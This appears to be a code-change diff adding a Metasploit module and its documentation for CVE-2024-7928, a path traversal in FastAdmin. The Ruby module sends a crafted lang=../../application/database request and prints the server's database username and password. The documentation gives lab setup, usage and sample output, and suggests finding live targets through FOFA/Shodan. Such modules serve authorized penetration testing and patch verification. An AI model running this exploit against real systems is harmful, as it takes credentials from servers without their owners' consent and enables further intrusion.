Add FastAdmin Path Traversal Module (CVE-2024-7928)

documentation/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.md

@@ -0,0 +1,121 @@
+## Vulnerable Application
+
+This module exploits a path traversal vulnerability in FastAdmin versions up to `1.3.3.20220121`, specifically within the `/index/ajax/lang` endpoint.
+By manipulating the `lang` parameter, unauthenticated remote attackers can access arbitrary files on the server, such as configuration files containing sensitive credentials.
+The vulnerability (CVE-2024-7928) has been publicly disclosed and is fixed in version `1.3.4.20220530`.
+
+- Affected version: <= 1.3.3.20220121
+- Fixed version: 1.3.4.20220530
+- CVE: [CVE-2024-7928](https://nvd.nist.gov/vuln/detail/CVE-2024-7928)
+- Advisory: https://s4e.io/tools/fastadmin-path-traversal-cve-2024-7928
+
+---
+
+## Target Setup
+
+To set up a test environment using the vulnerable version of FastAdmin:
+
+1. **Install Dependencies**
+   Ensure you have the following installed:
+   - PHP >= 7.1
+   - MySQL or MariaDB
+   - Web server (Apache or Nginx)
+
+2. **Download Vulnerable FastAdmin Version from Official Repo**
+   ```bash
+   git clone https://github.com/fastadminnet/fastadmin.git
+   cd fastadmin
+   git checkout 1.3.3.20220121
+   ```
+
+3. **Move to Web Server Directory**
+   Copy or move the project to your web server root:
+   ```bash
+   sudo mv fastadmin /var/www/html/
+   cd /var/www/html/fastadmin
+   ```
+
+4. **Set Permissions**
+   ```bash
+   sudo chown -R www-data:www-data .
+   sudo chmod -R 755 .
+   ```
+
+5. **Create Database**
+   Log into MySQL and run:
+   ```sql
+   CREATE DATABASE fastadmin DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci;
+   ```
+
+6. **Configure Database Connection**
+   Edit `application/database.php` and set your DB credentials:
+   ```php
+   'hostname' => '127.0.0.1',
+   'database' => 'fastadmin',
+   'username' => 'root',
+   'password' => 'yourpassword',
+   ```
+
+7. **Import the Database Schema**
+   ```bash
+   mysql -u root -p fastadmin < fastadmin.sql
+   ```
+
+---
+
+## Verification Steps
+
+1. Install the vulnerable version of FastAdmin or find targets using FOFA/Shodan.
+2. Start `msfconsole`
+3. Run:
+   ```
+   use auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928
+   ```
+4. Set `RHOSTS` and `RPORT`
+   ```
+   set RHOSTS 192.0.2.10
+   set RPORT 80  # Or the port you are targeting
+
+   ```
+5. Run the module with `run`
+6. On success, database credentials should be printed to the console
+
+---
+
+## Options
+
+```
+msf6 auxiliary(scanner/http/fastadmin_path_traversal_cve_2024_7928) > show options
+
+Module options (auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928):
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.0.2.10       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The base path to FastAdmin instance
+   THREADS    1                yes       The number of concurrent threads (max one per host)
+   VHOST                       no        HTTP server virtual host
+```
+
+---
+
+## Scenarios
+
+### FastAdmin 1.3.3.20220121 deployed with default configuration
+
+```
+msf6 > use auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928
+msf6 auxiliary(scanner/http/fastadmin_path_traversal_cve_2024_7928) > set RHOSTS 192.0.2.10
+rhosts => 192.0.2.10
+msf6 auxiliary(scanner/http/fastadmin_path_traversal_cve_2024_7928) > run
+[+] 192.0.2.10 is vulnerable!
+[+] DB Type   : mysql
+[+] Hostname  : <redacted>
+[+] Database  : fastadmin
+[+] Username  : root
+[+] Password  : <redacted>
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb

@@ -0,0 +1,94 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# Metasploit auxiliary module to exploit path traversal vulnerability (CVE-2024-7928) in FastAdmin and extract database credentials.
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'FastAdmin Path Traversal',
+        'Description' => 'Exploits path traversal vulnerability in FastAdmin (CVE-2024-7928) affecting versions up to 1.3.3.20220121, allowing unauthorized access to sensitive files via the lang parameter.',
+        'References' => [
+          %w[CVE 2024-7928],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-7928'],
+          ['URL', 'https://s4e.io/tools/fastadmin-path-traversal-cve-2024-7928']
+        ],
+        'Author' => [
+          'Rabbit 的个人中心', # Vulnerability discovery
+          'bigb0x',             # Python script
+          'Kazgangap'           # Metasploit module
+        ],
+        'DisclosureDate' => '2024-08-19',
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to FastAdmin instance', '/'])
+      ]
+    )
+  end
+
+  def run_host(host)
+    url = normalize_uri(datastore['TARGETURI'], 'index/ajax/lang?lang=../../application/database')
+
+    res = send_request_cgi('uri' => url, 'method' => 'GET')
+    unless res&.code == 200 && res.body.include?('jsonpReturn(')
+      print_error("#{host} is not vulnerable or did not respond as expected.")
+      return
+    end
+
+    jsonp_match = res.body.match(/jsonpReturn\((.*)\);/)
+    return print_error("#{host} - Failed to find JSONP structure.") unless jsonp_match
+
+    parse_jsonp_response(host, jsonp_match[1].strip)
+  rescue StandardError => e
+    print_error("#{host} - Error occurred: #{e.message}")
+  end
+
+  def parse_jsonp_response(host, jsonp_data)
+    data = parse_json(jsonp_data)
+    return unless data
+
+    unless data['username'] && data['password'] && data['database']
+      print_error("#{host} - Required fields missing in response.")
+      return
+    end
+
+    print_good("#{host} is vulnerable!")
+    print_good("DB Type   : #{data['type']}")
+    print_good("Hostname  : #{data['hostname']}")
+    print_good("Database  : #{data['database']}")
+    print_good("Username  : #{data['username']}")
+    print_good("Password  : #{data['password']}")
+
+    report_note(
+      host: host,
+      port: rport,
+      type: 'fastadmin.db.info',
+      data: data,
+      update: :unique_data
+    )
+  end
+
+  def parse_json(jsonp_data)
+    JSON.parse(jsonp_data)
+  rescue JSON::ParserError => e
+    print_error("Failed to parse JSONP response: #{e.message}")
+    nil
+  end
+end